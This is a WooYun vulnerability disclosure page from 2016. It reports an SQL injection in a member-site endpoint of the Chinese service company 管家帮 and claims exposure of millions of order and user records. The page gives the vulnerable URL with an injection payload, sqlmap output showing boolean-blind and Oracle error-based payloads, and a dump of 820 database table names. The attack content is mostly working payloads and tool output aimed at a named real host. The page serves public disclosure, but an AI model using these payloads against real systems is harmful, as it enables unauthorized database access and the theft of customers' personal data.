当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167320

漏洞标题:管家帮某站存在SQL注入漏洞(900万订单信息\700万用户信息)

相关厂商:管家帮

漏洞作者: 路人甲

提交时间:2016-01-05 09:34

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://member.95081.com/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1* --

1.png

2.png


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://member.95081.com:80/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1 AND 8171=8171 --
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: http://member.95081.com:80/checkNum/checkMessage!checkMessage.action?loginName=-1' OR 1=1 AND 7724=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (7724=7724) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) --
---
back-end DBMS: Oracle
Database: HAOGJ_V60
[820 tables]
+--------------------------------+
| ACCOUNT_TEMP                   |
| ACTIVITY_GROUP_AREA            |
| ALL_ORDER_GUANJB               |
| APP_KOUFEI                     |
| BABY_LOOKING_ANSWER            |
| BABY_LOOKING_QUESTION          |
| BABY_LOOKING_REMIND            |
| BAK_MAQ_EDJ_SERVICE            |
| BIOTOPE_BJ                     |
| BJ_MEMBER_ALL                  |
| BK_BILL_ALL                    |
| BK_HGJ_ORDER_FEE               |
| BMS_ADMIN                      |
| BMS_BASIC_ITEM                 |
| BMS_CODE                       |
| BMS_CODE_FATHER                |
| BMS_CODE_SON                   |
| BMS_ENTERPRISE_USER_AMOUNT     |
| BMS_ENTERPRISE_USER_DAILY      |
| BMS_ENTERPRISE_USER_MONTHLY    |
| BMS_GROUP                      |
| BMS_HOME_USER_AMOUNT           |
| BMS_HOME_USER_DAILY            |
| BMS_HOME_USER_MONTHLY          |
| BMS_INVESTIGATE_DAILY          |
| BMS_INVESTIGATE_MONTHLY        |
| BMS_LOG_LOGIN                  |
| BMS_MENU                       |
| BMS_OPERATE_LOG                |
| BMS_ORDER_DAILY                |
| BMS_ORDER_LOG                  |
| BMS_ORDER_MONTHLY              |
| BMS_ORDER_STATE_DAILY          |
| BMS_ORDER_STATE_MONTHLY        |
| BMS_REG_LOG                    |
| BMS_ROLE                       |
| BMS_ROLE_MENU                  |
| BUS_COMPANY                    |
| BUS_DRIVER                     |
| BUS_LOGIN                      |
| BUS_ORDER                      |
| BUS_PATH                       |
| BUS_PRICE                      |
| BUS_USER                       |
| CALL_ANSWER                    |
| CALL_LOG                       |
| CALL_OUT_LOG                   |
| CALL_QUESTION                  |
| CALL_QUESTION_VAL              |
| CALL_TASK                      |
| CALL_TASK_QUESTION             |
| CARD_BAT                       |
| CARD_CHONGZHI                  |
| CARD_INFO                      |
| CARD_INFO_BAT_QIYF             |
| CARD_INFO_NEW                  |
| CARD_INFO_NEWBAK               |
| CARD_INFO_OLDBAK               |
| CARD_INFO_QIXIAOF              |
| CARD_INFO_QIYF                 |
| CARD_USED                      |
| CELLID                         |
| CHAINED_ROWS                   |
| CITY_BILL_SUM                  |
| CITY_BOUNDS                    |
| CITY_GIFT                      |
| CITY_ORDER                     |
| CITY_ORDER_NUM                 |
| CITY_RATIO                     |
| CLICK_DRIVER_MOIBLE            |
| COMMENTS_INFO                  |
| COMMON_TEACHER_INFO            |
| CORP_SUBPHONE                  |
| CORP_VALIDATE                  |
| CUPON_USED                     |
| CUSTOMER_INFO                  |
| CUSTOMER_ORDER_ADDERSS         |
| DD2                            |
| DEPT_EDJ_DRIVER                |
| DEST_ORDER                     |
| DIALOGUE_VIDEO_INFO            |
| DJB_CALL_LOG                   |
| DKH_GOODS                      |
| DKH_GOODS_BK                   |
| DKH_GOODS_CLASS                |
| DKH_ORDER_DETAIL               |
| DKH_ORDER_REQUIER              |
| DRIVER_JOIN                    |
| DRIVINGCHARGES                 |
| DWB_USER                       |
| EDJ_ACCOUNT                    |
| EDJ_ACCOUNT_DETAIL             |
| EDJ_AREA                       |
| EDJ_BILL                       |
| EDJ_BLACK_LIST                 |
| EDJ_CALL_LOG                   |
| EDJ_CHARGE_STANDARD            |
| EDJ_CLIENT_CALL_LOG            |
| EDJ_COLLECT                    |
| EDJ_COMMENT                    |
| EDJ_CUSTOMER                   |
| EDJ_DRIVER                     |
| EDJ_DRIVER20141218             |
| EDJ_DRIVER20150407             |
| EDJ_DRIVER20150817             |
| EDJ_DRIVER20150825             |
| EDJ_DRIVERCALLBACK             |
| EDJ_DRIVER_EMOTTE              |
| EDJ_DRIVER_EMT                 |
| EDJ_DRIVER_LOG                 |
| EDJ_DRIVER_PATH                |
| EDJ_DRIVER_PEOPLE              |
| EDJ_DRIVER_RECORD              |
| EDJ_DRIVER_YM                  |
| EDJ_DWB_USER                   |
| EDJ_ERROR_LOG                  |
| EDJ_ESTAT_SERVICE              |
| EDJ_HOTELS                     |
| EDJ_INIT_LOG                   |
| EDJ_LOCATE_ERROR_LOG           |
| EDJ_MANAGER                    |
| EDJ_MATCH                      |
| EDJ_NOTICE                     |
| EDJ_NOTICE_TYPE                |
| EDJ_ORDER_SERVICE_EMT          |
| EDJ_PRICE                      |
| EDJ_SERVER_LOG                 |
| EDJ_SERVICE                    |
| EDJ_SERVICE_EMOTTE             |
| EDJ_SERVICE_EMOTTE_INFO        |
| EDJ_SERVICE_EMT                |
| EDJ_SERVICE_EMT_INFO_BASE      |
| EDJ_SERVICE_ORDER              |
| EDJ_SERVICE_ORDER_ALL          |
| EDJ_SERVICE_ORDER_EMT          |
| EDJ_SERVICE_STATISTICS         |
| EDJ_SERVICE_YM                 |
| EDJ_SERVICE_YM_NEWBAK          |
| EDJ_SPEC_PHONE                 |
| EDJ_USER_LOG                   |
| EDJ_USER_STATUS                |
| EDJ_USER_SUGGEST               |
| EDJ_VIP_DIRECTCALL_RECORDS     |
| EMAIL_SUBSCRIPTION             |
| EMOTE_ORDER_INFO_BK1           |
| EMOTTE_BALANCE                 |
| EMOTTE_DEST_FEE                |
| EMOTTE_FLOW                    |
| EMOTTE_FLOW1                   |
| EMOTTE_FLOW2                   |
| EMOTTE_FLOW_INIT               |
| EMOTTE_FLOW_INIT1              |
| EMOTTE_GJB_ORDER1              |
| EMOTTE_GJB_ORDER2              |
| EMOTTE_INCOME                  |
| EMOTTE_INCOME_FLOW             |
| EMOTTE_INCOME_INIT             |
| EMOTTE_INDEX_DATA              |
| EMOTTE_INDEX_SQL               |
| EMOTTE_MEMBER_INFO             |
| EMOTTE_MEMBER_REPLACE          |
| EMOTTE_MEMBER_REPLACE1         |
| EMOTTE_MEMBER_REPLACE2         |
| EMOTTE_ORDER_FEE_INFO          |
| EMOTTE_ORDER_INFO              |
| EMOTTE_PRICE                   |
| EMOTTE_PRICE1                  |
| EMOTTE_TEST_USER               |
| EMOTTE_USER                    |
| EMOTTE_USER_INFO               |
| EMOTTE_USER_INFO_ALL           |
| EMOTTE_USER_TP                 |
| EMS_ACCESS_CONFIG              |
| EMS_ACCESS_LOG                 |
| EMS_ADMIN_LOG                  |
| EMS_ATTRIBUTE                  |
| EMS_BOOKING_GOODS              |
| EMS_BRAND                      |
| EMS_CART                       |
| EMS_CATEGORY                   |
| EMS_CATEGORY_ZZ                |
| EMS_CAT_RECOMMEND              |
| EMS_COLLECT_GOODS              |
| EMS_COMMENT                    |
| EMS_GOODS                      |
| EMS_GOODS_ATTR_RELATION        |
| EMS_GOODS_CAT_RELATION         |
| EMS_GOODS_GROUP                |
| EMS_GOODS_LINK                 |
| EMS_GOODS_PIC                  |
| EMS_GOODS_TYPE                 |
| EMS_INVOICE                    |
| EMS_NAV                        |
| EMS_ORDER_GOODS                |
| EMS_ORDER_INFO                 |
| EMS_ORDER_LOG                  |
| EMS_PAYMENT                    |
| EMS_PAY_LOG                    |
| EMS_RETURNS_GOOD               |
| EMS_SEARCH_LOG                 |
| EMS_SHIPPING                   |
| EMS_SHIPPING_GOODS             |
| EMS_SHIPPING_LOG               |
| EMS_USER_ADDRESS               |
| EM_DEST                        |
| EPUB_AD_BASE                   |
| EPUB_AD_ORDER                  |
| ESPREAD_ACCOUNT                |
| ESPREAD_CONTRACT_BATCH_PRICE   |
| ESPREAD_CONTRACT_PRICE         |
| ESPREAD_ORDER_FEE              |
| ESPREAD_PAY_HISTORY            |
| ESPREAD_TOTAL_ORDER_FEE_DAY    |
| ESPREAD_TOTAL_ORDER_FEE_MONTH  |
| ESPREAD_USER                   |
| ESTATE_ORDER_OPERATION_MONTH   |
| ESTAT_ACCOUNT_MONTH            |
| ESTAT_APPLY_DAY                |
| ESTAT_APPLY_MONTH              |
| ESTAT_CALLKIND_DAY             |
| ESTAT_CALLKIND_MONTH           |
| ESTAT_CALLORDER_REPORT         |
| ESTAT_CONVENIENCE_DAY          |
| ESTAT_CONVENIENCE_MONTH        |
| ESTAT_CORP_SERVICE             |
| ESTAT_HX_ORDER                 |
| ESTAT_MENU_STAT                |
| ESTAT_OPERATOR_LOG_DAY         |
| ESTAT_OPERATOR_LOG_MONTH       |
| ESTAT_OPERATOR_ORDER_DAY       |
| ESTAT_OPERATOR_ORDER_MONTH     |
| ESTAT_ORDERFLOW_DAY            |
| ESTAT_ORDERFLOW_MONTH          |
| ESTAT_ORDERSATIS_DAY           |
| ESTAT_ORDERSATIS_MONTH         |
| ESTAT_ORDERSRC_ALL             |
| ESTAT_ORDERSRC_ALL_DB          |
| ESTAT_ORDERSRC_ALL_EXTEND      |
| ESTAT_ORDERSRC_ALL_OLD         |
| ESTAT_ORDERSRC_DAY             |
| ESTAT_ORDERSRC_MONTH           |
| ESTAT_ORDER_ADD_DAILY          |
| ESTAT_ORDER_ADD_DAILYBAK       |
| ESTAT_ORDER_ADD_MONTHLY        |
| ESTAT_ORDER_FEE_DAY            |
| ESTAT_ORDER_FEE_MONTH          |
| ESTAT_ORDER_MATCH_FAIL_DAY     |
| ESTAT_ORDER_MATCH_FAIL_MONTH   |
| ESTAT_ORDER_OPERATION_DAY      |
| ESTAT_ORDER_OPERATION_MONTH    |
| ESTAT_ORDER_SERV_DAY           |
| ESTAT_ORDER_SERV_MONTH         |
| ESTAT_REVORDER_DAY             |
| ESTAT_REVORDER_MONTH           |
| ESTAT_SERVICE                  |
| ESTAT_TOTAL                    |
| ESTAT_USER                     |
| ESTAT_USER_GROUP               |
| ESTAT_USER_MENU                |
| ESTAT_USER_ROLE                |
| EXPERT_AND_USER                |
| FIRST_ORDER                    |
| FRIENDLY_LINK_MANA             |
| GJBSERVICE                     |
| GJB_GOOD                       |
| GJB_GOOD_ALBUM                 |
| GJB_GOOD_BEIJ                  |
| GJB_SOUGOU_MAP                 |
| GPS_EQUIP_INFO                 |
| GPS_USER_INFO                  |
| GROUP_BANK_MIDDLE_DETAIL       |
| GROUP_INCOME_BANK_FLOW         |
| GUEST_INFO                     |
| HAOGJ_ORDER_ALL_DATA           |
| HEADER_BANNER_CITY             |
| HEADER_BANNER_CLASS            |
| HGJ_ACCOUNT_LOG                |
| HGJ_ACTIVE_MONTHER             |
| HGJ_ACTIVE_ONE_HOUR            |
| HGJ_ADVER_ORDER                |
| HGJ_ADVICE                     |
| HGJ_ALBUM                      |
| HGJ_APPLY_NEED                 |
| HGJ_APP_BAK                    |
| HGJ_APP_BL                     |
| HGJ_AWARD_HISTORY              |
| HGJ_BACK_HISTORY               |
| HGJ_BI1L                       |
| HGJ_BIL1                       |
| HGJ_BILL                       |
| HGJ_BILL_APP                   |
| HGJ_BILL_C1                    |
| HGJ_BILL_G                     |
| HGJ_BILL_INFO                  |
| HGJ_BILL_L                     |
| HGJ_BILL_TMP                   |
| HGJ_BLACKLIST_LOG              |
| HGJ_BROADCAST                  |
| HGJ_CALLOUT_NEW                |
| HGJ_CALLOUT_PROJECT            |
| HGJ_CALL_DETAIL                |
| HGJ_CALL_LOG                   |
| HGJ_CALL_TYPE                  |
| HGJ_CANCEL_ORDER               |
| HGJ_CHAT_MEMBER                |
| HGJ_CHECKID_LOG                |
| HGJ_CITY_HOURPRICE             |
| HGJ_CLASS                      |
| HGJ_CLASS_BJ                   |
| HGJ_CLASS_BK                   |
| HGJ_CLASS_BK150105             |
| HGJ_CLASS_BK150106             |
| HGJ_CLASS_BK150106BK           |
| HGJ_CLASS_BK150106BKZ          |
| HGJ_CLASS_BK150106LUZHANHUI    |
| HGJ_COMPLAINT                  |
| HGJ_CONTRACT                   |
| HGJ_CONTRACT_BATCH_PRICE       |
| HGJ_CONTRACT_PRICE             |
| HGJ_CONVENIENCE                |
| HGJ_COOPERATION                |
| HGJ_COOP_DISCOUNT              |
| HGJ_CORP_AD_IMAGE              |
| HGJ_CORP_ALBUM                 |
| HGJ_CORP_COMMENT               |
| HGJ_CORP_CREDIT                |
| HGJ_CORP_EMPLOYEE              |
| HGJ_CORP_ITEM_FEE              |
| HGJ_CORP_PIC                   |
| HGJ_CORP_RECOMMAND             |
| HGJ_COUNT                      |
| HGJ_CUSTOMER                   |
| HGJ_DIFF                       |
| HGJ_DIVERT                     |
| HGJ_DOMAIN                     |
| HGJ_EMPLOYEE_BASE              |
| HGJ_EMPLOYEE_HISTORY           |
| HGJ_EMP_COMMENT                |
| HGJ_EVAL_DETAIL                |
| HGJ_EVAL_HISTORY               |
| HGJ_EVAL_QUESTION              |
| HGJ_EXPONENT                   |
| HGJ_FAIL_ORDER_SHOW            |
| HGJ_GIFT                       |
| HGJ_GOODS_CREDIT               |
| HGJ_GROUD_SELLER               |
| HGJ_HEADER_BANNER              |
| HGJ_HOME_USER                  |
| HGJ_HOT_LINE                   |
| HGJ_INCOME                     |
| HGJ_INCOME1                    |
| HGJ_INTEGRAL_INFO              |
| HGJ_INTEGRAL_USER              |
| HGJ_INVESTIGATE                |
| HGJ_INVITE_CORP                |
| HGJ_INVITE_EMPLOYEE            |
| HGJ_JOIN_CORP                  |
| HGJ_KEYWORDS_LOG               |
| HGJ_KEYWORDS_MANAGE            |
| HGJ_KEY_WORD                   |
| HGJ_KIND_REPORT                |
| HGJ_LEFT_ORDER_LOG             |
| HGJ_MAP_INFO                   |
| HGJ_MEMBERPAY_LOG              |
| HGJ_MEMBER_90                  |
| HGJ_MEMBER_ACCOUNT             |
| HGJ_MEMBER_ACCOUNT20141212     |
| HGJ_MEMBER_BASE                |
| HGJ_MEMBER_BASE_ZHANGZ         |
| HGJ_MEMBER_CODE                |
| HGJ_MEMBER_COMMENT             |
| HGJ_MEMBER_EXTEND              |
| HGJ_MEMBER_INDEX_LEVEL         |
| HGJ_MEMBER_LOG                 |
| HGJ_MEMBER_NUM                 |
| HGJ_MEMBER_OPEN                |
| HGJ_MEMBER_ORDER               |
| HGJ_MEMBER_PARENT              |
| HGJ_MEMBER_PAY                 |
| HGJ_MEMBER_QUOTA               |
| HGJ_MEMBER_REPORT              |
| HGJ_MEMBER_SERVICE             |
| HGJ_MESSAGES_LOG               |
| HGJ_MESSAGE_LINK               |
| HGJ_MESSAGE_SEND               |
| HGJ_NEWS                       |
| HGJ_OABLL                      |
| HGJ_OA_BL                      |
| HGJ_ORDER_ALL                  |
| HGJ_ORDER_BASE                 |
| HGJ_ORDER_BASE0824             |
| HGJ_ORDER_BASE_BK              |
| HGJ_ORDER_CHANNEL              |
| HGJ_ORDER_DEST                 |
| HGJ_ORDER_EXTEND               |
| HGJ_ORDER_FEE_DETAIL           |
| HGJ_ORDER_FEE_DETAILBK15010112 |
| HGJ_ORDER_FEE_HISTORY          |
| HGJ_ORDER_FEE_INFO             |
| HGJ_ORDER_INFO                 |
| HGJ_ORDER_MATCH                |
| HGJ_ORDER_MATCH_TEST           |
| HGJ_ORDER_MEMBER               |
| HGJ_ORDER_MODEL                |
| HGJ_ORDER_OVER_TIME            |
| HGJ_ORDER_SERVICE              |
| HGJ_ORDER_XML                  |
| HGJ_ORDER_XMLINFO              |
| HGJ_ORDER_XML_13               |
| HGJ_ORDER_XML_LJQ              |
| HGJ_OTHER_SERVICE              |
| HGJ_PERSONAL_ACCOUNT           |
| HGJ_PUBLISH_ITEM               |
| HGJ_PUBLISH_ITEMANSWER         |
| HGJ_PUBLISH_TEMPLATE           |
| HGJ_PUB_INFO                   |
| HGJ_PUB_INFO_ITEM              |
| HGJ_PUB_TOP_LOG                |
| HGJ_QUESTIONARY_ANSWER         |
| HGJ_QUESTIONARY_QUESTION       |
| HGJ_QUESTIONARY_SHEET          |
| HGJ_REALINFO                   |
| HGJ_REGION                     |
| HGJ_REGION_TREE                |
| HGJ_SCORERECORD                |
| HGJ_SERVICE_PERSONNEL          |
| HGJ_SHORT_URL                  |
| HGJ_SMS_SEND                   |
| HGJ_SUPPORT_INFO               |
| HGJ_TEMP_PRICE                 |
| HGJ_TJ                         |
| HGJ_USER                       |
| HGJ_USER_CORPSET               |
| HGJ_USER_CREDIT                |
| HGJ_USER_CREDIT_HISTORY        |
| HGJ_VIP                        |
| HGJ_VIP_CARD                   |
| HGJ_VOTER                      |
| HGJ_VOTERECORD                 |
| HGJ_WEB_FEE_DETAIL             |
| HGJ_WEB_ORDER                  |
| HGJ_WEB_ORDER_BB               |
| HGJ_WWW_ORDER                  |
| HOMEORDERGROUP                 |
| HOME_COMPLAINT                 |
| HOME_ORDERSHOW                 |
| HOME_PHOTO                     |
| HOME_REMARK                    |
| HOME_REMARK_BY_SERVICE         |
| HOME_SCORES                    |
| HOME_SCORE_CATALOG             |
| HOT_KEY_WORD                   |
| HX_AGENT_CALL_DETAIL_BEIJING   |
| HX_AGENT_CALL_DETAIL_CITY      |
| HX_AGENT_CALL_DETAIL_EXTEND    |
| INCOME_TOTAL                   |
| JZ                             |
| JZB_COMPANY                    |
| JZB_SERVICE_PERSONNEL          |
| JZB_SERVICE_PRICE              |
| JZB_TEMP                       |
| JZB_TEMP1                      |
| JZB_TEMP2                      |
| JZ_STORES                      |
| J_BILL_INFO                    |
| J_BILL_INFO_LANT               |
| J_BILL_INFO_LANT123            |
| J_BILL_LOG                     |
| J_BILL_RECORD                  |
| J_BILL_RECORD_LANT             |
| J_CHECK_PRODUCT                |
| J_CHECK_PRODUCT_LANT           |
| J_CHECK_STORE                  |
| J_CHECK_STORE_LANT             |
| J_ORDER_INFO                   |
| J_ORDER_INFO_LANT              |
| J_PRODUCT_INFO                 |
| J_PRODUCT_INFO_LANT            |
| LBS_DATA                       |
| LBS_DATA1                      |
| LBS_DATA2                      |
| LBS_DATA_CDMA                  |
| LBS_ERROR_DATA                 |
| LBS_HISTORY                    |
| LBS_STATUS                     |
| LIYT_TEST_USER                 |
| MANAGZINE_MANAGEMENT           |
| MEMBER_REP                     |
| MEMBER_ZF                      |
| MEMBER_ZF1                     |
| MLOG$_TEST_USER                |
| MMS_USER_TEST                  |
| MOBILE_CLIENT                  |
| MOVE_CAR                       |
| MOVE_CAR_HISTORY               |
| MOVE_CAR_PERSON                |
| MOVE_PERSON                    |
| NEWS_TYPE                      |
| NHXX_DISTRIBUTION_AREA         |
| NHXX_GOODS                     |
| NHXX_ORDER_REQUIRE             |
| NHXX_TASK                      |
| OK_DATA_INFO                   |
| OPERATOR_RECORD                |
| ORDER_AND_CONFIRM              |
| ORDER_MAP                      |
| ORDER_USER                     |
| ORDER_USER2                    |
| ORDER_USER3                    |
| PAY_DATA                       |
| PAY_ORDER                      |
| PAY_ORDER_V2                   |
| PAY_PLATFORM                   |
| PAY_REGISTER                   |
| PAY_ZHIFUBAO                   |
| PERSON_PERCENT_CITY            |
| PERSON_PERCENT_COUNTY          |
| PHONE_NAME                     |
| PINGJIA_ZUHE                   |
| PINGYIN_CODE_NAME              |
| PINYIN_COD_NAME                |
| PLSQL_PROFILER_DATA            |
| PLSQL_PROFILER_RUNS            |
| PLSQL_PROFILER_UNITS           |
| POLICY_LAW                     |
| PUBLISH_COMPLAINT_MANA         |
| PUBLISH_MESSAGE                |
| RESIDENTS_MESSAGE_BOARD        |
| RUPD$_TEST_USER                |
| SA                             |
| SELECT_USER_RECORD             |
| SEND_MESSAGE_INFO              |
| SERVICE_PERSON_REGIST          |
| SHOW_WEB_PERSONNEL             |
| SJB_EVENTS                     |
| SJB_GUESS                      |
| SMS_CLASS_COURSE               |
| SMS_CLASS_MANAGER              |
| SMS_COURSE_MANAGER             |
| SMS_LABOR_DISPATCH             |
| SMS_ORDER_TRAIN                |
| SMS_STUDENT_BASE               |
| SMS_STUDENT_CLASS              |
| SMS_TEA_MANAGER                |
| SMS_TRAIN_AUDIT                |
| SP_MOBILE                      |
| SS1                            |
| STATISTICSCLIENTPERSON20130411 |
| STATISTICS_CLIENT              |
| STATISTICS_CLIENT1             |
| STATISTICS_CLIENT2             |
| STATISTICS_CLIENT_LILANG       |
| STATISTICS_CLIENT_OTHER        |
| STATISTICS_CLIENT_PERSON       |
| STATISTICS_CLIENT_PERSON_DATA  |
| STATISTICS_CLIENT_PERSON_IDG   |
| STATISTICS_CLIENT_PERSON_INFO  |
| STATISTICS_CLIENT_PER_INFO_HS  |
| STATISTICS_CLIENT_P_I_0427     |
| STATISTICS_INCOME_DETAIL       |
| STATISTIC_INCOME_TOTAL         |
| STAT_IN_DETAILWWWWW            |
| STAT_MEMBER_CITY               |
| STAT_MEMBER_CITY_M             |
| STAT_ORDER_CITY                |
| STAT_SANTY                     |
| STAT_USER_CITY                 |
| STAT_USER_CITY_M               |
| ST_BILL_ORDER_DAILY            |
| ST_BILL_ORDER_MONTHLY          |
| ST_BILL_STATISTIC_DAILY        |
| ST_BILL_STATISTIC_MONTHLY      |
| ST_CALLOUT_MEMBER_DAILY        |
| ST_CALLOUT_MEMBER_MONTHLY      |
| ST_CALLOUT_STATUS_DAILY        |
| ST_CALLOUT_STATUS_MONTHLY      |
| ST_CORP_ORDER_DAILY            |
| ST_CORP_ORDER_MONTHLY          |
| ST_FINISH_ORDER_DAILY          |
| ST_FINISH_ORDER_MONTHLY        |
| ST_HGJ_EMPLOYEE_ORDER_DAY      |
| ST_HGJ_EMPLOYEE_ORDER_MONTH    |
| ST_HGJ_MEMBER_ORDER_DAY        |
| ST_HGJ_MEMBER_ORDER_MONTH      |
| ST_HJ_ORDER_ADD_DAILY          |
| ST_HJ_ORDER_ADD_MONTHLY        |
| ST_HJ_ORDER_FEEDBACK_DAILY     |
| ST_HJ_ORDER_FEEDBACK_MONTHLY   |
| ST_HJ_ORDER_FLOW_DAILY         |
| ST_HJ_ORDER_FLOW_MONTHLY       |
| ST_HJ_ORDER_INV_DAILY          |
| ST_HJ_ORDER_INV_MONTHLY        |
| ST_HJ_ORDER_MATCH_FAIL_DAILY   |
| ST_HJ_ORDER_MATCH_FAIL_MONTHLY |
| ST_HJ_ORDER_OPERATION_DAILY    |
| ST_HJ_ORDER_OPERATION_MONTHLY  |
| ST_HJ_ORDER_OPERATOR_DAILY     |
| ST_HJ_ORDER_OPERATOR_MONTHLY   |
| ST_HJ_ORDER_REVOKE_DAILY       |
| ST_HJ_ORDER_REVOKE_MONTHLY     |
| ST_HJ_O_FEEDBACK_CORP_DAILY    |
| ST_HJ_O_FEEDBACK_CORP_MONTHLY  |
| ST_HX_MEMBER_BASE_NEW_DAILY    |
| ST_HX_MEMBER_BASE_NEW_MONTHLY  |
| ST_HX_MEMBER_BASE_ORDER        |
| ST_HX_MEMBER_BASE_SUM          |
| ST_HX_MEMBER_MANAGER_DAILY     |
| ST_HX_MEMBER_MANAGER_MONTHLY   |
| ST_ORDER_LOG_DAILY             |
| ST_ORDER_LOG_MONTHLY           |
| SYS_EXPORT_SCHEMA_01           |
| SYS_REMARKE                    |
| T1                             |
| T1031_ADDRESS                  |
| T1031_DEST_ORDER               |
| T1031_FEE_INFO                 |
| T1031_ORDER_BASE               |
| T1031_ORDER_BASE1              |
| T1031_ORDER_BASE2              |
| T1031_ORDER_BASE3              |
| T1031_ORDER_BASE4              |
| T1031_ORDER_BASE5              |
| T1031_ORDER_BASE6              |
| T1031_ORDER_BASE7              |
| T1031_ORDER_BASE8              |
| T1031_ORDER_BASE_1117          |
| T1031_ORDER_DEMO               |
| T1031_ORDER_TMP                |
| T1031_ORDER_TMP1               |
| T1031_TMP                      |
| T1031_TMP1                     |
| T1031_TMP_ORDER                |
| T1031_USER                     |
| T1031_USER_INFO                |
| T1031_USER_INFO1               |
| T1031_USER_MAP                 |
| T1031_USER_MODEL               |
| T1031_USER_NOADDRESS           |
| T1031_USER_TMP                 |
| T1031_USER_TMP1                |
| TAXI_SERVICE                   |
| TEMP_123                       |
| TEMP_67                        |
| TEMP_CALL                      |
| TEMP_DELREMARK_BAK             |
| TEMP_EDJ_FEE                   |
| TEMP_EDJ_ORDER_SERVICE_EMT     |
| TEMP_EDJ_SERVICE_ID            |
| TEMP_EDJ_SERVICE_MOB_DIB       |
| TEMP_EDJ_SERVICE_TEMP          |
| TEMP_EDJ_SERVICE_TEMP_TEMP     |
| TEMP_EMOTTE_USER_DIB           |
| TEMP_HGJ_CLASS_COOPID          |
| TEMP_HGJ_MEMBER_ACCOUNT        |
| TEMP_HGJ_ORDER                 |
| TEMP_HGJ_WEB_ORDER             |
| TEMP_ID                        |
| TEMP_MOB2014                   |
| TEMP_MOB2014_2014              |
| TEMP_MOBILE_CITY               |
| TEMP_MOB_1                     |
| TEMP_MOB_1_1                   |
| TEMP_MOB_RN                    |
| TEMP_MYID                      |
| TEMP_ORDER_ID                  |
| TEMP_PJ                        |
| TEMP_REMARK                    |
| TEMP_SCP                       |
| TEMP_SERMOB                    |
| TEMP_SERVICE                   |
| TEMP_SERVICE0519               |
| TEMP_SERVICE_USER              |
| TEMP_SER_ID                    |
| TEMP_TEMP                      |
| TEMP_TTT                       |
| TEMP_WORKINFO                  |
| TEMP_XY                        |
| TEST111                        |
| TESTLIYUNTAO                   |
| TEST_A                         |
| TEST_A1                        |
| TEST_B                         |
| TEST_BILL_2013                 |
| TEST_BZ                        |
| TEST_CITY                      |
| TEST_CITY_PHONE                |
| TEST_CITY_PHONE1               |
| TEST_CORP                      |
| TEST_CORP1                     |
| TEST_CORP2                     |
| TEST_CORP3                     |
| TEST_EDIT_MEMBER               |
| TEST_G1                        |
| TEST_MEMBER                    |
| TEST_MEMBER1                   |
| TEST_MEMBER_G                  |
| TEST_NAME_1031                 |
| TEST_O1                        |
| TEST_O2                        |
| TEST_ORDER_ALL                 |
| TEST_P                         |
| TEST_STY                       |
| TEST_STY1                      |
| TEST_STY2                      |
| TEST_ST_ORDER                  |
| TEST_ST_USER                   |
| TEST_ST_USER1                  |
| TEST_ST_USER2                  |
| TEST_T1                        |
| TEST_TMP                       |
| TEST_U1                        |
| TEST_U2                        |
| TEST_U3                        |
| TEST_U4                        |
| TEST_USER                      |
| TEST_USER_SH                   |
| TMP_CHECK_UN                   |
| TMP_FEE_DETAIL                 |
| TMP_ID                         |
| TMP_IMEI                       |
| TMP_MEMBER                     |
| TMP_REMARK_CONTENT             |
| TMP_TB                         |
| TMP_USER_COUNT                 |
| TRAINNING_CORP                 |
| TRAINNING_JOBS_TYPE            |
| TRAINNING_SEMESTER_STUDENTS    |
| TRAINNING_STUDENT_ADMIN        |
| TRAINNING_TERMERS              |
| TRAIN_VIDEO_MANA               |
| TS_INFO_NEWS                   |
| T_BMS_LOG_ACT                  |
| T_BMS_LOG_IN                   |
| T_COMPAY_NUMBER_XDP            |
| T_CUSTOMER_BASE_INFO           |
| T_EDJ_SERVICE                  |
| T_HOME_REMARK_SERVICE          |
| T_HOME_SCORES                  |
| T_PAY_DATA                     |
| T_REMARK                       |
| USER_AND_BIAO                  |
| USER_AWARD_RECORD              |
| USER_COMPLAINT                 |
| USER_INFORM_INFO               |
| USER_REPORT                    |
| USER_SURVEY                    |
| UTIL_BILL                      |
| UTIL_BILL_ORDER_COUNT          |
| UTIL_CITY                      |
| UTIL_KIND                      |
| UTIL_KIND1                     |
| UTIL_MEMBER                    |
| UTIL_MEMBER_BASE               |
| UTIL_PRICE                     |
| UTIL_STAT_FEE                  |
| UTIL_STAT_ORDER                |
| UTIL_STAT_ORDERALL             |
| UTIL_SUCC_USER                 |
| UTIL_USER                      |
| UTIL_USER_LOG                  |
| UTIL_USER_LOG_ALL              |
| UTIL_USER_LOG_NEW              |
| VIEW_INVESTIGATE_REAL          |
| VIP_PAY_RECORD                 |
| V_HOUSE_WORKER_CONFIG          |
| WEIXIN_CLEAR_LOG               |
| WEIXIN_GUEST                   |
| WEIXIN_PLAYER                  |
| WIN_QIAN_DAO                   |
| WX_ACTIVITY                    |
| WX_ACTIVITY_USER               |
| WX_ACTIVTY_COUPON              |
| WX_CROWDFUNDING_PART           |
| WX_CROWDFUNDING_ROUND          |
| WX_CUSTOM_SERVICE              |
| WX_KANJIA                      |
| WX_MES                         |
| WX_USER                        |
| YCDJ_MEMBER                    |
| YCDJ_MEMBER_USER               |
| YONGHU_ADDRESS_WDM             |
| YONGHU_WDM                     |
| YOYO                           |
| ZL_ALARM                       |
| ZL_ALARM_TEMP                  |
| ZL_APPLY_SUBSIDY_INFO          |
| ZL_BATCARD                     |
| ZL_BLOOD_OXYGEN                |
